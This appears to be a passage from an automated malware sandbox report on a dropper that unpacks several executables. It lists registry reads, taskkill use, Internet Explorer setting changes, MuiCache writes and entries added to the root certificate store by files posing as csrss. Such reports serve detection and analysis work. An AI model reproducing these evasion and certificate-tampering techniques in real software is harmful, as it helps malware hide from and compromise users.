Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\YFBh.exE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue121e696b2d94fe.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue125fd9410f80dd6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue123e8bf9beda40e5.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-22 = "Cape Verde Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-471 = "Ekaterinburg Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Program Files (x86)\Gparted\Build.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a441400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a319000000010000001000000014c3bd3549ee225aece13734ad8ca0b82000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
